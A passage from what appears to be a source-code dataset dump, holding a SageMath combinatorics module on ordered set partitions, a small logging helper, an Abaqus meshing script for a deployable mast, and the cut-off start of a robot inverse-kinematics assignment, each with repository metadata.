Return the cardinality of ``self``.
The number of ordered partitions of a set of size `n` into `k`
parts is equal to `k! S(n,k)` where `S(n,k)` denotes the Stirling
number of the second kind.
EXAMPLES::
sage: OrderedSetPartitions(4,2).cardinality()
14
sage: OrderedSetPartitions(4,1).cardinality()
1
"""
return factorial(self.n) * stirling_number2(len(self._set), self.n)
def __iter__(self):
"""
EXAMPLES::
sage: [ p for p in OrderedSetPartitions([1,2,3,4], 2) ]
[[{1, 2, 3}, {4}],
[{1, 2, 4}, {3}],
[{1, 3, 4}, {2}],
[{2, 3, 4}, {1}],
[{1, 2}, {3, 4}],
[{1, 3}, {2, 4}],
[{1, 4}, {2, 3}],
[{2, 3}, {1, 4}],
[{2, 4}, {1, 3}],
[{3, 4}, {1, 2}],
[{1}, {2, 3, 4}],
[{2}, {1, 3, 4}],
[{3}, {1, 2, 4}],
[{4}, {1, 2, 3}]]
"""
for x in Compositions(len(self._set),length=self.n):
for z in OrderedSetPartitions_scomp(self._set, x):
yield self.element_class(self, z)
class OrderedSetPartitions_scomp(OrderedSetPartitions):
def __init__(self, s, comp):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,1,1])
sage: OS == loads(dumps(OS))
True
"""
OrderedSetPartitions.__init__(self, s)
self.c = Composition(comp)
def __repr__(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4], [2,1,1])
Ordered set partitions of {1, 2, 3, 4} into parts of size [2, 1, 1]
"""
return "Ordered set partitions of %s into parts of size %s" % (Set(self._set), self.c)
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,1,1])
sage: all(sp in OS for sp in OS)
True
sage: OS.cardinality()
12
sage: len([x for x in OrderedSetPartitions([1,2,3,4]) if x in OS])
12
"""
return OrderedSetPartitions.__contains__(self, x) and [len(z) for z in x] == self.c
def cardinality(self):
r"""
Return the cardinality of ``self``.
The number of ordered set partitions of a set of length `k` with
composition shape `\mu` is equal to
.. MATH::
\frac{k!}{\prod_{\mu_i \neq 0} \mu_i!}.
EXAMPLES::
sage: OrderedSetPartitions(5,[2,3]).cardinality()
10
sage: OrderedSetPartitions(0, []).cardinality()
1
sage: OrderedSetPartitions(0, [0]).cardinality()
1
sage: OrderedSetPartitions(0, [0,0]).cardinality()
1
sage: OrderedSetPartitions(5, [2,0,3]).cardinality()
10
"""
return factorial(len(self._set)) / prod([factorial(i) for i in self.c])
def __iter__(self):
"""
TESTS::
sage: [ p for p in OrderedSetPartitions([1,2,3,4], [2,1,1]) ]
[[{1, 2}, {3}, {4}],
[{1, 2}, {4}, {3}],
[{1, 3}, {2}, {4}],
[{1, 4}, {2}, {3}],
[{1, 3}, {4}, {2}],
[{1, 4}, {3}, {2}],
[{2, 3}, {1}, {4}],
[{2, 4}, {1}, {3}],
[{3, 4}, {1}, {2}],
[{2, 3}, {4}, {1}],
[{2, 4}, {3}, {1}],
[{3, 4}, {2}, {1}]]
sage: len(OrderedSetPartitions([1,2,3,4], [1,1,1,1]))
24
sage: [ x for x in OrderedSetPartitions([1,4,7], [3]) ]
[[{1, 4, 7}]]
sage: [ x for x in OrderedSetPartitions([1,4,7], [1,2]) ]
[[{1}, {4, 7}], [{4}, {1, 7}], [{7}, {1, 4}]]
sage: [ p for p in OrderedSetPartitions([], []) ]
[[]]
sage: [ p for p in OrderedSetPartitions([1], [1]) ]
[[{1}]]
Let us check that it works for large size (:trac:`16646`)::
sage: OrderedSetPartitions(42).first()
[{1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}, {10}, {11}, {12},
{13}, {14}, {15}, {16}, {17}, {18}, {19}, {20}, {21}, {22}, {23},
{24}, {25}, {26}, {27}, {28}, {29}, {30}, {31}, {32}, {33}, {34},
{35}, {36}, {37}, {38}, {39}, {40}, {41}, {42}]
"""
comp = self.c
lset = [x for x in self._set]
l = len(self.c)
dcomp = [-1] + comp.descents(final_descent=True)
p = []
for j in range(l):
p += [j + 1] * comp[j]
for x in permutation.Permutations_mset(p):
res = permutation.to_standard(x).inverse()
res = [lset[x - 1] for x in res]
yield self.element_class(self, [Set(res[dcomp[i]+1:dcomp[i+1]+1])
for i in range(l)])
class OrderedSetPartitions_all(OrderedSetPartitions):
r"""
Ordered set partitions of `\{1, \ldots, n\}` for all
`n \in \ZZ_{\geq 0}`.
"""
def __init__(self):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions()
sage: TestSuite(OS).run() # long time
"""
Parent.__init__(self, category=InfiniteEnumeratedSets())
def __iter__(self):
"""
Iterate over ``self``.
EXAMPLES::
sage: it = iter(OrderedSetPartitions())
sage: [next(it) for _ in range(10)]
[[], [{1}], [{1}, {2}], [{2}, {1}], [{1, 2}],
[{1}, {2}, {3}], [{1}, {3}, {2}], [{2}, {1}, {3}],
[{3}, {1}, {2}], [{2}, {3}, {1}]]
"""
n = 0
while True:
for X in OrderedSetPartitions(n):
yield self.element_class(self, list(X))
n += 1
def _element_constructor_(self, s):
"""
Construct an element of ``self`` from ``s``.
EXAMPLES::
sage: OS = OrderedSetPartitions()
sage: OS([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
if isinstance(s, OrderedSetPartition):
gset = s.parent()._set
if gset == frozenset(range(1,len(gset)+1)):
return self.element_class(self, list(s))
raise ValueError("cannot convert %s into an element of %s"%(s, self))
return self.element_class(self, list(s))
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4])
sage: AOS = OrderedSetPartitions()
sage: all(sp in AOS for sp in OS)
True
sage: AOS.__contains__([[1,3], [4], [5,2]])
True
sage: AOS.__contains__([Set([1,3]), Set([4]), Set([5,2])])
True
sage: [Set([1,4]), Set([3])] in AOS
False
sage: [Set([1,3]), Set([4,2]), Set([2,5])] in AOS
False
sage: [Set([1,2]), Set()] in AOS
False
"""
if isinstance(x, OrderedSetPartition):
if x.parent() is self:
return True
gset = x.parent()._set
return gset == frozenset(range(1, len(gset)+1))
# x must be a list or a tuple
if not isinstance(x, (list, tuple)):
return False
# Check to make sure each element of the list is a nonempty set
if not all(s and isinstance(s, (set, frozenset, list, tuple, Set_generic)) for s in x):
return False
if not all(isinstance(s, (set, frozenset, Set_generic)) or len(s) == len(set(s)) for s in x):
return False
X = set(reduce(lambda A,B: A.union(B), x, set()))
return len(X) == sum(len(s) for s in x) and X == set(range(1,len(X)+1))
def _coerce_map_from_(self, X):
"""
Return ``True`` if there is a coercion map from ``X``.
EXAMPLES::
sage: OSP = OrderedSetPartitions()
sage: OSP._coerce_map_from_(OrderedSetPartitions(3))
True
sage: OSP._coerce_map_from_(OrderedSetPartitions(['a','b']))
False
"""
if X is self:
return True
if isinstance(X, OrderedSetPartitions):
return X._set == frozenset(range(1,len(X._set)+1))
return super(OrderedSetPartitions_all, self)._coerce_map_from_(X)
def _repr_(self):
"""
TESTS::
sage: OrderedSetPartitions()
Ordered set partitions
"""
return "Ordered set partitions"
class Element(OrderedSetPartition):
def _richcmp_(self, other, op):
"""
TESTS::
sage: OSP = OrderedSetPartitions()
sage: el1 = OSP([[1,3], [4], [2]])
sage: el2 = OSP([[3,1], [2], [4]])
sage: el1 == el1, el2 == el2, el1 == el2 # indirect doctest
(True, True, False)
sage: el1 <= el2, el1 >= el2, el2 <= el1 # indirect doctest
(False, True, True)
"""
return richcmp([sorted(s) for s in self],
[sorted(s) for s in other], op)
##########################################################
# Deprecations
class SplitNK(OrderedSetPartitions_scomp):
def __setstate__(self, state):
r"""
For unpickling old ``SplitNK`` objects.
TESTS::
sage: loads(b"x\x9ck`J.NLO\xd5K\xce\xcfM\xca\xccK,\xd1+.\xc8\xc9,"
....: b"\x89\xcf\xcb\xe6\n\x061\xfc\xbcA\xccBF\xcd\xc6B\xa6\xda"
....: b"Bf\x8dP\xa6\xf8\xbcB\x16\x88\x96\xa2\xcc\xbc\xf4b\xbd\xcc"
....: b"\xbc\x92\xd4\xf4\xd4\"\xae\xdc\xc4\xec\xd4x\x18\xa7\x905"
....: b"\x94\xd1\xb45\xa8\x90\r\xa8>\xbb\x90=\x03\xc85\x02r9J\x93"
....: b"\xf4\x00\xb4\xc6%f")
Ordered set partitions of {0, 1, 2, 3, 4} into parts of size [2, 3]
"""
self.__class__ = OrderedSetPartitions_scomp
n = state['_n']
k = state['_k']
OrderedSetPartitions_scomp.__init__(self, range(state['_n']), (k,n-k))
from sage.misc.persist import register_unpickle_override
register_unpickle_override("sage.combinat.split_nk", "SplitNK_nk", SplitNK)
| 33.044586
| 172
| 0.492161
|
a083b11e2f70f493ffad22134db53448a26f3c71
| 851
|
py
|
Python
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 12
|
2016-04-01T10:59:14.000Z
|
2022-01-27T04:05:43.000Z
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 16
|
2016-03-18T10:44:00.000Z
|
2019-08-12T05:52:24.000Z
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 2
|
2016-09-08T11:49:39.000Z
|
2020-09-09T04:39:15.000Z
|
# vim: set fenc=utf8 ts=4 sw=4 et :
import sys
from .conf import Conf
def debug(*args):
# import here because of circular dependencies
from .flow import Flow
if Conf.DEBUG:
print(
'[Debug: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_DEBUG
)
def warning(*args):
# import here because of circular dependencies
from .flow import Flow
print(
'[Warning: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_WARNING
)
def error(*args):
# import here because of circular dependencies
from .flow import Flow
print(
'[Error: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_ERROR
)
| 21.275
| 50
| 0.553467
|
98550c3d67773465e204b8e565e9aed335e86437
| 16,853
|
py
|
Python
|
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
# Abaqus/CAE script
# Created by M.A. Bessa (M.A.Bessa@tudelft.nl) on 12-Nov-2019 05:29:40
#
from abaqus import *
from abaqusConstants import *
session.viewports['Viewport: 1'].makeCurrent()
#session.viewports['Viewport: 1'].maximize()
from caeModules import *
from driverUtils import executeOnCaeStartup
executeOnCaeStartup()
Mdb()
#
import numpy
#------------------------------------------------------------
os.chdir(r'/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72')
#
#-------------------------------------------------------------
# Parameters:
VertexPolygon = 3 # Number of vertices (sides) of the polygon base
power = 1.00000e+00 # Power law exponent establishing the evolution of the spacing between battens
MastDiameter = 1.00000e+02 # Radius of the circumscribing circle of the polygon
nStories = 1 # Number of stories in HALF of the strut (i.e. in a single AstroMast!)
MastPitch = 9.39469e+01 # Pitch length of the strut (i.e. a single AstroMast!)
pinned_joints = 1 # (1 = batten are pinned to longerons, 0 = battens and longerons are a solid piece)
Longeron_CS = 1.00007e+01 # (Cross Section of the longeron)
Ix = 1.03996e+02 # (Second moment of area around X axis )
Iy = 7.50000e+01 # (Second moment of area around Y axis )
J = 2.50000e+02 # (Second moment of area around X axis )
Emodulus = 1.82600e+03 # (Youngus Modulus)
Gmodulus = 6.57373e+02 # (Shear Modulus)
nu = 3.88861e-01 # (Poisson Ratio)
ConeSlope = 5.00000e-01 # Slope of the longerons (0 = straight, <0 larger at the top, >0 larger at the bottom)
Twist_angle = 0.00000e+00 # Do you want to twist the longerons?
transition_length_ratio = 1.00000e+00 # Transition zone for the longerons
#------------------------------------------------------------
MastRadius = MastDiameter/2.0
MastHeight = nStories*MastPitch
Mesh_size = min(MastRadius,MastPitch)/300.0
session.viewports['Viewport: 1'].setValues(displayedObject=None)
# Create all the joints of the a single Deployable Mast:
joints = numpy.zeros((nStories+1,VertexPolygon,3))
joints_outter = numpy.zeros((nStories+1,VertexPolygon,3))
for iStorey in range(0,nStories+1,1):
for iVertex in range(0,VertexPolygon,1):
# Constant spacing between each storey (linear evolution):
Zcoord = MastHeight/nStories*iStorey
# Power-law spacing between each storey (more frequent at the fixed end):
# Zcoord = MastHeight*(float(iStorey)/float(nStories))**power
# Power-law spacing between each storey (more frequent at the rotating end):
# Zcoord = -MastHeight/(float(nStories)**power)*(float(nStories-iStorey)**power)+MastHeight
# Exponential spacing between each storey
# Zcoord =(MastHeight+1.0)/exp(float(nStories))*exp(float(iStorey))
#
Xcoord = MastRadius*cos(2.0*pi/VertexPolygon*iVertex + Twist_angle*min(Zcoord/MastHeight/transition_length_ratio,1.0))
Ycoord = MastRadius*sin(2.0*pi/VertexPolygon*iVertex + Twist_angle*min(Zcoord/MastHeight/transition_length_ratio,1.0))
# Save point defining this joint:
joints[iStorey,iVertex,:] = (Xcoord*(1.0-min(Zcoord,transition_length_ratio*MastHeight)/MastHeight*ConeSlope),Ycoord*(1.0-min(Zcoord,transition_length_ratio*MastHeight)/MastHeight*ConeSlope),Zcoord)
#
center = (0.0,0.0)
vec = joints[iStorey,iVertex,0:2]-center
norm_vec = numpy.linalg.norm(vec)
joints_outter[iStorey,iVertex,2] = joints[iStorey,iVertex,2]
joints_outter[iStorey,iVertex,0:2] = joints[iStorey,iVertex,0:2]
# end iSide loop
#end iStorey loop
# Create the longerons:
p_longerons = mdb.models['Model-1'].Part(name='longerons', dimensionality=THREE_D,
type=DEFORMABLE_BODY)
p_longerons = mdb.models['Model-1'].parts['longerons']
session.viewports['Viewport: 1'].setValues(displayedObject=p_longerons)
d_longerons, r_longerons = p_longerons.datums, p_longerons.referencePoints
LocalDatum_list = [] # List with local coordinate system for each longeron
long_midpoints = [] # List with midpoints of longerons (just to determine a set containing the longerons)
e_long = p_longerons.edges
for iVertex in range(0,VertexPolygon,1):
# First create local coordinate system (useful for future constraints, etc.):
iStorey=0
origin = joints[iStorey,iVertex,:]
point2 = joints[iStorey,iVertex-1,:]
name = 'Local_Datum_'+str(iVertex)
LocalDatum_list.append(p_longerons.DatumCsysByThreePoints(origin=origin, point2=point2, name=name,
coordSysType=CARTESIAN, point1=(0.0, 0.0, 0.0)))
#
# Then, create the longerons
templist = [] # List that will contain the points used to make each longeron
for iStorey in range(0,nStories+1,1):
templist.append(joints[iStorey,iVertex,:])
if iStorey != 0: # Save midpoints of bars
long_midpoints.append( [(joints[iStorey-1,iVertex,:]+joints[iStorey,iVertex,:])/2 , ])
# end if
# end iStorey loop
p_longerons.WirePolyLine(points=templist,
mergeType=IMPRINT, meshable=ON)
# Create set for each longeron (to assign local beam directions)
for i in range(0,len(templist)): # loop over longerons edges
if i == 0:
select_edges = e_long.findAt([templist[0], ]) # Find the first edge
else:
# Now find remaining edges in longerons
temp = e_long.findAt([templist[i], ])
select_edges = select_edges + temp
#end if
#end i loop
longeron_name = 'longeron-'+str(iVertex)+'_set'
p_longerons.Set(edges=select_edges, name=longeron_name)
#end for iVertex loop
# Longerons set:
e_long = p_longerons.edges
select_edges = []
for i in range(0,len(long_midpoints)): # loop over longerons edges
if i == 0:
select_edges = e_long.findAt(long_midpoints[0]) # Find the first edge
else:
# Now find remaining edges in longerons
temp = e_long.findAt(long_midpoints[i])
select_edges = select_edges + temp
#end if
#end i loop
p_longerons.Set(edges=select_edges, name='all_longerons_set')
all_longerons_set_edges = select_edges
p_longerons.Surface(circumEdges=all_longerons_set_edges, name='all_longerons_surface')
# Create a set with all the joints:
v_long = p_longerons.vertices
select_vertices = []
select_top_vertices = []
select_bot_vertices = []
for iStorey in range(0,nStories+1,1):
for iVertex in range(0,VertexPolygon,1):
# Select all the joints in the longerons:
current_joint = v_long.findAt( [joints[iStorey,iVertex,:] , ] ) # Find the first vertex
current_joint_name = 'joint-'+str(iStorey)+'-'+str(iVertex)
# Create a set for each joint:
p_longerons.Set(vertices=current_joint, name=current_joint_name)
#
if iStorey == 0 and iVertex == 0:
select_vertices = current_joint # Instantiate the first point in set
else:
select_vertices = select_vertices + current_joint # Instantiate the first point in set
# endif iStorey == 0 and iVertex == 0
#
if iStorey == 0: # Also save the bottom nodes separately
if iVertex == 0:
# Start selecting the bottom joints for implementing the boundary conditions
select_bot_vertices = current_joint
else:
select_bot_vertices = select_bot_vertices + current_joint
# endif iStorey == 0:
elif iStorey == nStories: # Also save the top nodes separately
if iVertex == 0:
# Start selecting the top joints for implementing the boundary conditions
select_top_vertices = current_joint
else: # remaining vertices:
select_top_vertices = select_top_vertices + current_joint
#end if
#end iVertex loop
#end iStorey loop
p_longerons.Set(vertices=select_vertices, name='all_joints_set')
p_longerons.Set(vertices=select_bot_vertices, name='bot_joints_set')
p_longerons.Set(vertices=select_top_vertices, name='top_joints_set')
#
# Create materials:
mdb.models['Model-1'].Material(name='NiTi_alloy')
mdb.models['Model-1'].materials['NiTi_alloy'].Elastic(table=((83.0E3, 0.31),
))
mdb.models['Model-1'].materials['NiTi_alloy'].Density(table=((1.0E-3, ), ))
mdb.models['Model-1'].Material(name='PC')
mdb.models['Model-1'].materials['PC'].Elastic(table=((2134, 0.27),
))
mdb.models['Model-1'].materials['PC'].Density(table=((1.19E-3, ), ))
mdb.models['Model-1'].Material(name='PLA')
mdb.models['Model-1'].materials['PLA'].Elastic(table=((Emodulus, nu),
))
mdb.models['Model-1'].materials['PLA'].Density(table=((1.24E-3, ), ))
mdb.models['Model-1'].Material(name='CNT')
mdb.models['Model-1'].materials['CNT'].Elastic(table=((1000.0E3, 0.3),
))
mdb.models['Model-1'].materials['CNT'].Density(table=((1.0E-3, ), ))
# Create beam profiles and beam sections:
mdb.models['Model-1'].GeneralizedProfile(name='LongeronsProfile', area=Longeron_CS, i11=Ix, i12=0.0, i22=Iy, j=J, gammaO=0.0, gammaW=0.0)
mdb.models['Model-1'].BeamSection(name='LongeronsSection', integration=
BEFORE_ANALYSIS, poissonRatio=0.31, beamShape=CONSTANT,
profile='LongeronsProfile', density=0.00124, thermalExpansion=OFF,
temperatureDependency=OFF, dependencies=0, table=((Emodulus, Gmodulus), ),
alphaDamping=0.0, betaDamping=0.0, compositeDamping=0.0, centroid=(0.0,
0.0), shearCenter=(0.0, 0.0), consistentMassMatrix=False)
# Assign respective sections:
p_longerons.SectionAssignment(offset=0.0,
offsetField='', offsetType=MIDDLE_SURFACE, region=
p_longerons.sets['all_longerons_set'],
sectionName='LongeronsSection', thicknessAssignment=FROM_SECTION)
# Assing beam orientation:
for iVertex in range(0,VertexPolygon,1):
iStorey=0
dir_vec_n1 = joints[iStorey,iVertex,:]-(0.,0.,0.) # Vector n1 perpendicular to the longeron tangent
longeron_name = 'longeron-'+str(iVertex)+'_set'
region=p_longerons.sets[longeron_name]
p_longerons.assignBeamSectionOrientation(region=region, method=N1_COSINES, n1=dir_vec_n1)
#end for iVertex
#
delta = Mesh_size/100.0
########################################################################
#Mesh the structure
#refPlane = p_longerons.DatumPlaneByPrincipalPlane(principalPlane=XYPLANE, offset=L/2)
#d = p.datums
#All_faces = facesLeafs+facesDoubleThickBoom
#p.PartitionFaceByDatumPlane(datumPlane=d[refPlane.id], faces=All_faces)
##
#session.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF
# engineeringFeatures=OFF, mesh=ON)
#session.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(
# meshTechnique=ON)
#p = mdb.models['Model-1'].parts['reducedCF_TRAC_boom']
p_longerons.seedPart(size=Mesh_size, deviationFactor=0.04, minSizeFactor=0.001,
constraint=FINER)
p_longerons.seedEdgeBySize(edges=all_longerons_set_edges, size=Mesh_size, deviationFactor=0.04,
constraint=FINER)
elemType_longerons = mesh.ElemType(elemCode=B31, elemLibrary=STANDARD) # Element type
p_longerons.setElementType(regions=(all_longerons_set_edges, ), elemTypes=(elemType_longerons, ))
p_longerons.generateMesh()
#######################################################################
# Make Analytical surfaces for contact purposes
s1 = mdb.models['Model-1'].ConstrainedSketch(name='__profile__',
sheetSize=MastRadius*3.0)
g, v, d, c = s1.geometry, s1.vertices, s1.dimensions, s1.constraints
s1.setPrimaryObject(option=STANDALONE)
s1.Line(point1=(0.0, -MastRadius*1.1), point2=(0.0, MastRadius*1.1))
s1.VerticalConstraint(entity=g[2], addUndoState=False)
p_surf = mdb.models['Model-1'].Part(name='AnalyticSurf', dimensionality=THREE_D,
type=ANALYTIC_RIGID_SURFACE)
p_surf = mdb.models['Model-1'].parts['AnalyticSurf']
p_surf.AnalyticRigidSurfExtrude(sketch=s1, depth=MastRadius*2.2)
s1.unsetPrimaryObject()
rigid_face = p_surf.faces
#surf_select = f.findAt((0.0,MastRadius*1.05,0.0))
#surf_select = f[0]
p_surf.Surface(side1Faces=rigid_face, name='rigid_support')
#p_surf.Set(faces=surf_select, name='support_surface_set')
#p_surf.sets['all_diagonals_set']
#
# Make assembly:
a = mdb.models['Model-1'].rootAssembly
a.DatumCsysByDefault(CARTESIAN)
# Create reference points to assign boundary conditions
RP_ZmYmXm = a.ReferencePoint(point=(0.0, 0.0, -1.1*MastRadius))
refpoint_ZmYmXm = (a.referencePoints[RP_ZmYmXm.id],)
a.Set(referencePoints=refpoint_ZmYmXm, name='RP_ZmYmXm')
#
RP_ZpYmXm = a.ReferencePoint(point=(0.0, 0.0, MastHeight+1.1*MastRadius))
refpoint_ZpYmXm = (a.referencePoints[RP_ZpYmXm.id],)
a.Set(referencePoints=refpoint_ZpYmXm, name='RP_ZpYmXm')
#
# Create longerons
a_long = a.Instance(name='longerons-1-1', part=p_longerons, dependent=ON)
# Create bottom surface
a_surf_bot = a.Instance(name='AnalyticSurf-1-1', part=p_surf, dependent=ON)
# Now rotate the plane to have the proper direction
a.rotate(instanceList=('AnalyticSurf-1-1', ), axisPoint=(0.0, 0.0, 0.0),
axisDirection=(0.0, 1.0, 0.0), angle=90.0)
#
# Create set with surface
select_bot_surf=a_surf_bot.surfaces['rigid_support']
# Perhaps we need to define a set instead of a face
#AnalyticSurf_surface=a_surf_bot.Surface(side1Faces=select_bot_surf, name='support_surf_bot-1')
mdb.models['Model-1'].RigidBody(name='Constraint-RigidBody_surf_bot-1', refPointRegion=refpoint_ZmYmXm,
surfaceRegion=select_bot_surf)
for iVertex in range(0,VertexPolygon,1):
#
# Select appropriate coordinate system:
DatumID = LocalDatum_list[iVertex].id
datum = a_long.datums[DatumID]
for iStorey in range(0,nStories+1,1):
# Current joint:
current_joint_name = 'joint-'+str(iStorey)+'-'+str(iVertex)
# Define COUPLING constraints for all the joints:
if iStorey == 0: # Bottom base:
#
master_region=a.sets['RP_ZmYmXm'] # Note that the master is the Reference Point
#
slave_region=a_long.sets[current_joint_name]
# Make constraint for this joint:
Constraint_name = 'RP_ZmYmXm_PinConstraint-'+str(iStorey)+'-'+str(iVertex)
mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=OFF, ur2=ON, ur3=ON)
#
#Constraint_name = 'RP_ZmYmXm_FixedConstraint-'+str(iStorey)+'-'+str(iVertex)
#mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
# surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
# localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=ON, ur2=ON, ur3=ON)
# Make constraint for this joint:
elif iStorey == nStories: # Top base:
#
master_region=a.sets['RP_ZpYmXm'] # Note that the master is the Reference Point
#
slave_region=a_long.sets[current_joint_name]
# Make constraint for this joint:
Constraint_name = 'RP_ZpYmXm_PinConstraint-'+str(iStorey)+'-'+str(iVertex)
mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=OFF, ur2=ON, ur3=ON)
#
#Constraint_name = 'RP_ZpYmXm_FixedConstraint-'+str(iStorey)+'-'+str(iVertex)
#mdb.models['Model-1'].Coupling(name=Constraint_name, controlPoint=master_region,
# surface=slave_region, influenceRadius=WHOLE_SURFACE, couplingType=KINEMATIC,
# localCsys=datum, u1=ON, u2=ON, u3=ON, ur1=ON, ur2=ON, ur3=ON)
# Make constraint for this joint:
else: # Middle stories:
master_region=a_long.sets[current_joint_name]
#
slave_region=a_bat.sets[current_joint_name]
# Make constraint for this joint:
#endif iStorey
#
#end for iStorey
#end for iVertex
#
# Create hinges:
#select_joints=a.instances['deployable_mast-1'].sets['all_joints_set']
#select_RefPoint=a.sets['RP_joints']
#mdb.models['Model-1'].RigidBody(name='JointsContraint', refPointRegion=select_RefPoint,
# pinRegion=select_joints)
#
# Export mesh to .inp file
#
mdb.Job(name='include_mesh_DoE72', model='Model-1', type=ANALYSIS, explicitPrecision=SINGLE,
nodalOutputPrecision=SINGLE, description='',
parallelizationMethodExplicit=DOMAIN, multiprocessingMode=DEFAULT,
numDomains=1, userSubroutine='', numCpus=1, memory=90,
memoryUnits=PERCENTAGE, scratch='', echoPrint=OFF, modelPrint=OFF,
contactPrint=OFF, historyPrint=OFF)
import os
mdb.jobs['include_mesh_DoE72'].writeInput(consistencyChecking=OFF)
# End of python script
| 44.467018
| 206
| 0.692933
|
1c3bfa42909e72f3da5ec15ede1344602925a55d
| 118
|
py
|
Python
|
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
ELAB02/02-08.py
|
tawanchaiii/01204111_63
|
edf1174f287f5174d93729d9b5c940c74d3b6553
|
[
"WTFPL"
] | null | null | null |
x = int(input())
l = [1000,500,100,50,20,10,5,1]
for i in range(8):
print(f"{l[i]} => {x//l[i]}")
x = x%l[i]
| 16.857143
| 32
| 0.466102
|
1a339db0fc264095507bb7ddeb15a7dd997feacc
| 3,029
|
py
|
Python
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 48
|
2021-11-27T05:28:31.000Z
|
2022-02-06T16:08:30.000Z
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 15
|
2021-03-03T10:50:59.000Z
|
2021-06-21T07:47:47.000Z
|
lecture_04/assignment_03/Ina_Cheibas/assignment_03.py
|
g-jami/COMPAS-II-FS2021
|
3282036db5f7caa2d904370d47878e578092ae24
|
[
"MIT"
] | 25
|
2021-03-02T15:08:11.000Z
|
2022-03-29T14:34:20.000Z
|
# """Assignment 03: Using inverse kinematics
# """
import json
import os
from compas_fab.backends import RosClient
from compas_fab.robots import Configuration
from compas.geometry import Frame
from compas.geometry import Point
from compas.geometry import Vector
from compas_fab.utilities import write_data_to_json
# This function defines the inputs of your assignment, you get a compas_fab.robots.Robot and a Frame
# and are expected to return ONE valid configuration to reach that frame
def calculate_ik(robot, frame):
# 1. define a valid start configuration for your frames
start_configuration = robot.zero_configuration()
# 2. use inverse kinematics to find out a valid configuration
configuration = robot.inverse_kinematics(frame, start_configuration)
# print("Found configuration", configuration)
return configuration
def store_configurations(configurations):
# 3. store all found configurations in a JSON file
here = os.path.dirname(__file__)
path = os.path.abspath(os.path.join(here, "json_file.json"))
configuration_json =[]
for configuration in configurations:
configuration_json.append(configuration.data)
write_data_to_json(configuration_json, path)
# pass
# Use the following to test from the command line
# Or copy solution_viewer.ghx next to the folder where you created assignment_03.py to visualize the same in Grasshopper
if __name__ == '__main__':
frame_list = [
Frame(Point(0.084, 0.319, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.152, 0.317, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.220, 0.315, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.288, 0.313, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.357, 0.310, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.425, 0.308, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.493, 0.306, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.561, 0.303, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
Frame(Point(0.629, 0.301, 0.175), Vector(0.000, 0.000, -1.000), Vector(0.000, 1.000, 0.000)),
